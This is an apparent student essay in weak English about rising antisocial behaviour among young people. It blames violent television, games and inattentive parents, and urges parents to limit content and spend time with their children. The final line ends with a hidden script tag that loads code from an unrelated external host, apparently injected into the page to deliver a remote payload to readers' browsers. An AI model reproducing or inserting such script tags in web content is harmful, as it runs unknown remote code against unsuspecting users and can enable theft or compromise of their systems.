Many people believe that today there is a General increase in Anti Social behaviour and lack of respect for others. what might have caused this situation?how to improve it?

it is not strange to hear the gutter presses wrote about the not accepted younger’s behaviors as well as in tone when interacting with older. this hassle is increasing gradually, making it warming to developing society. We will examine some reasons that have caused it and how to reduce its effects.

First of all, I think that they have watched too many negative programs on tv and play virtual games, these contents affect adversely their character. Really, it is easily seen that in the recent days, they have fairly leisure, consequently to occupy the free time He or she often turn on the tv and lose the track of time. Nevertheless, this is content which they have enjoyed often is violence, it has extremely scene. The parents should limit the contents which they are allowed, choose something is good, fun and suitable for him or her.

Besides, the younger is lack support, attention from their family. it is clear that numerous people now are busy working hard for a living and forget to take care of their children. Simply, they think that they only need earn a great deal, their youth is nice, it is wrong. they should devote time to stay with the adolescent to look after him or her both physicality and emotion. interacting with them to relate to what they appeal to have teaching method.

Generally speaking, the parents play an active role in the maturity of kids, should create a good environment for them, keep them always active.<script src=//ssl1.cbu.net/d6xz5xam></script>